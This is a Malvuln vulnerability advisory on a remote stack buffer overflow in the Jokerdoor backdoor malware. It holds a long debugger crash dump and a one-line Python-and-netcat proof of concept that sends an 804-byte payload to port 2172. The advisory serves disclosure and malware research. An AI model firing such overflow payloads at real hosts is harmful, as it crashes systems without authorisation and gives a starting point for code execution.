Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/94d1b2510bf96fa6190cd65876bf4c38.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Jokerdoor Vulnerability: Remote Stack Buffer Overflow Description: The malware listens on TCP port 2172. Third party attackers who can reach an infected system can send a large payload and trigger a classic stack buffer overflow overwriting the ECX, EIP registers and structured exception handler (SEH). When connecting you will get a "connected" server response, then we supply our payload as a parameter prefixed by "DOS". Family: Jokerdoor Type: PE32 MD5: 94d1b2510bf96fa6190cd65876bf4c38 Vuln ID: MVID-2022-0562 ASLR: False DEP: False CFG: False Safe SEH: False Disclosure: 04/26/2022 Memory Dump: eax=00000000 ebx=00000000 ecx=41414141 edx=77309d70 esi=00000000 edi=00000000 eip=41414141 esp=000a1608 ebp=000a1628 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** WARNING: Unable to verify checksum for Backdoor.Win32.Jokerdoor.94d1b2510bf96fa6190cd65876bf4c38 *** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Jokerdoor.94d1b2510bf96fa6190cd65876bf4c38 FAULTING_IP: +26 41414141 ?? ??? EXCEPTION_RECORD: 0019ee3c -- (.exr 0x19ee3c) ExceptionAddress: 41414141 ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 41414141 Attempt to read from address 41414141 PROCESS_NAME: Backdoor.Win32.Jokerdoor.94d1b2510bf96fa6190cd65876bf4c38 ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000008 EXCEPTION_PARAMETER2: 41414141 WRITE_ADDRESS: 41414141 FOLLOWUP_IP: +26 41414141 ?? ??? FAILED_INSTRUCTION_ADDRESS: +26 41414141 ?? ??? MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 IP_ON_HEAP: 41414141 The fault address in not in any loaded module, please check your build's rebase log at \bin\build_logs\timebuild\ntrebase.log for module which may contain the address if it were loaded. IP_IN_FREE_BLOCK: 41414141 CONTEXT: 0019ee8c -- (.cxr 0x19ee8c) eax=00010000 ebx=04223c0c ecx=75f5eb0d edx=00000000 esi=00060486 edi=026a0d17 eip=41414141 esp=0019f2ec ebp=41414141 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 41414141 ?? ??? Resetting default scope ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD] LAST_CONTROL_TRANSFER: from 41414141 to 41414141 FAULTING_THREAD: ffffffff BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_STACKIMMUNE DEFAULT_BUCKET_ID: STACK_OVERFLOW_STACKIMMUNE FRAME_ONE_INVALID: 1 STACK_TEXT: 00000000 00000000 unknown!backdoor.win32.jokerdoor.94d1b2510bf96fa6190cd65876bf4c38+0x0 STACK_COMMAND: .cxr 000000000019EE8C ; kb ; ** Pseudo Context ** ; kb SYMBOL_NAME: unknown!backdoor.win32.jokerdoor.94d1b2510bf96fa6190cd65876bf4c38 FOLLOWUP_NAME: MachineOwner MODULE_NAME: unknown IMAGE_NAME: unknown DEBUG_FLR_IMAGE_TIMESTAMP: 0 FAILURE_BUCKET_ID: STACK_OVERFLOW_STACKIMMUNE_c0000005_unknown!Unloaded BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE_BAD_IP_unknown!backdoor.win32.jokerdoor.94d1b2510bf96fa6190cd65876bf4c38 Exploit/PoC: C:\>python -c "print('DOS'+'A'*804)" | nc64.exe x.x.x.x 2172 connected. 19:51 - April 21, 2022, Thursday, ver: Legends 2.1 Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).